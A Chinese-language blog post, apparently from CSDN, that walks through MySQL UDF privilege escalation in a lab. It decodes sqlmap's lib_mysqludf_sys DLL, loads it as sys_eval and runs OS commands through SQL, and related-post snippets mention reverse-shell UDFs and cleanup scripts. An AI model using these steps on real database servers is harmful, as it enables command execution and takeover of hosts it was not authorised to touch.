UDF提权(mysql)

已于 2022-09-14 20:11:26 修改
阅读量824 收藏 5
点赞数 9
分类专栏: 网络安全 文章标签: mysql 数据库 database
于 2022-06-12 21:52:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63127854/article/details/125250553
版权

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

漏洞复现专栏:https://blog.csdn.net/m0_63127854/category_11843863.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

环境

1.什么是UDF:用户自定义函数

2.前提

3.查看mysql位数

4.打开sqlmap文件夹

5.dl_文件为了防止误杀,dll_文件会经过异或编码,不能直接用,如果想用的话需要对其进行解码

6.解码

7.上传dll文件至指定文件夹(mysql安装目录下的lib/plugin/)

8.在mysql命令行导入函数

9.执行命令

环境

攻击机 win10

靶机     win7(192.168.20.130)

1.什么是UDF:用户自定义函数

udf = “user defined function”,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就像使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中,存在于’mysql/lib/plugin’目录下,文件后缀为’.dll’

2.前提

mysql5.0以上的需要在mysql安装目录的lib目录下新建一个plugin文件夹,5.0以下的,上传目录为D:/windows

3.查看mysql位数

show variables like '%compile%';

4.打开sqlmap文件夹

  

5.dl_文件为了防止误杀,dll_文件会经过异或编码,不能直接用,如果想用的话需要对其进行解码

6.解码

执行python cloak.py -d -i

D:\python3.10.0\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

7.上传dll文件至指定文件夹(mysql安装目录下的lib/plugin/)

8.在mysql命令行导入函数

create function sys_eval returns string soname 'lib_mysqludf_sys.dll';

9.执行命令

select sys_eval('whoami');

不知名白帽
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
mysql udf.dll_mysql udf.dll提权入侵.bat文件
weixin_33168794的博客
02-27 62
net stop mysqldel %SystemRoot%system32udf.dll /A/F/Qdel %SystemRoot%udf.dll /A/F/Qdel %SystemRoot%tempudf.dll /A/F/Qdir %SystemRoot%system32com > %SystemRoot%system32udf.dlldir %SystemRoot%system32...
mysql udf.dll_关于MYSQL udf.dll 提权入侵
weixin_35474374的博客
01-19 82
批处理代码:net stop mysqldel %SystemRoot%\system32\udf.dll /A/F/Qdel %SystemRoot%\udf.dll /A/F/Qdel %SystemRoot%\temp\udf.dll /A/F/Qdir %SystemRoot%\system32\com > %SystemRoot%\system32\udf.dlldir %Syst...
mysql udf.dll(UDF)漏洞修补
surpaimb的专栏
12-12 1215
下面的内容保存为一个BAT文件,下载附件,将附件里的XCACLS.vbs文件和BAT文件放在一个目录下,双击执行BAT文件。  程序代码 net stop mysql del %SystemRoot%system32udf.dll /A/F/Q del %SystemRoot%udf.dll /A/F/Q del %SystemRoot% empudf.dll /A/F/Q dir %System
MySQLUDF
shaoyiwenet的专栏
11-21 9577
最近用到MySQLUDF, 查了一下相关文献, 对用户用户实现function和Aggregate function的方法做个介绍.
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
mysql提权udf
09-20
mysql免杀UDF 提权必不可少神器。必须配备
SqlMap之mysql udf.dll 提权
weixin_34324081的博客
09-01 682
先上传dll文件到任意目录,如:D:/RECYCLER/lib_mysqludf_sys.dll导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径):select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/w...
mysql udf提权
weixin_60719780的博客
03-16 1023
udf提权只要是因为udf.dll文件,攻击者通过编写调用cmd或者shell的udf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们提权需要使用这个16进制的udf.dll文件;
mysql 5.5 udf提权_MySQL_UDF提权
weixin_31548723的博客
01-27 642
大三就快结束啦,也要轮到我找工作啦,结合网上的资料和自己的经验准备了一些材料,算是对自己技术方面的小小总结吧。趁这个机会查缺补漏做一些原来知道但没有动手试过的实验。一、原理udf 即 user defined function,文件后缀为.dll。通过在 udf 文件中定义新函数,可以对 mysql 的功能进行扩充,利用 mysql 账号 root 权限创建可以执行系统命令函数的 udf.dll ...
转载 udf.dll 源码
ask_man的专栏
06-23 1607
mysql是一个常用的数据库系统,应用极广泛,如果得到一个mysql的用户权限,如果提升呢,下面这个思路很先进! 但得有一定编程基础!      现在网上通过mysql获得系统权限大都通过MYSQL的用户函数接口UDF,比如Mix.dll和my_udf.dll。在Mix.dll中有一个MixConnect函数它会反弹shell,但是使用这个函数会造成MYSQL假死,前些天我就用这个函数反
MySQL-多表查询
qq_57157023的博客
04-25 987
MySQL多表查询
Mysql_数据库事务
最新发布
weixin_69252724的博客
04-26 1180
事务就是由单独单元的一个或多个sql语句组成,在这个单元中,每个sql语句都是相互依赖的。而整个单独单元是作为一个不可分割的整体存在,类似于化学当中的原子(一种不可分割的最小单位)。往通俗的讲就是,事务就是一个整体,里面的内容要么都执行成功,要么都不成功。不可能存在部分执行成功而部分执行不成功的情况。就是说如果单元中某条sql语句一旦执行失败或者产生错误,那么整个单元将会回滚(返回最初状态)。
88张表-Mysql
2301_80151755的博客
04-25 232
【代码】88张表-Mysql
问题-MySQL将较大的SQL文件导入MySQL
qq_1905369638
04-25 433
迁移数据的时候,我们有时候会用sqlyog等数据库工具导入到新数据库。可能插入的SQL语句太大,出现导入一半失败的情况。明明代码没错,这让人摸不着头脑。
mysql全量备份及数据恢复实践
东方客的博客
04-25 347
-stream=xbstream xtrabackup自带的压缩软件格式。--no-server-version-check 不做版本检查。gzip 使用gz压缩,缩小空间占用。--backup 执行备份的参数。
【prometheus】监控MySQL并实现可视化
康师傅没有眼泪
04-25 3297
mysqld_exporter 是一个用于监控 MySQL 服务器的开源工具,它是由 Prometheus 社区维护的一个官方 Exporter。该工具通过连接到 MySQL 服务器并执行各种查询来收集关于 MySQL 服务器性能和状态的指标,并将这些指标暴露给 Prometheus 监控系统。总的来说,mysqld_exporter 是一个功能强大且易于使用的工具,可以帮助用户监控和诊断其 MySQL 服务器的性能和健康状态,从而及时发现和解决潜在的问题。导入模板后,选择import。
mysql udf 提权
03-06
需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知名白帽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值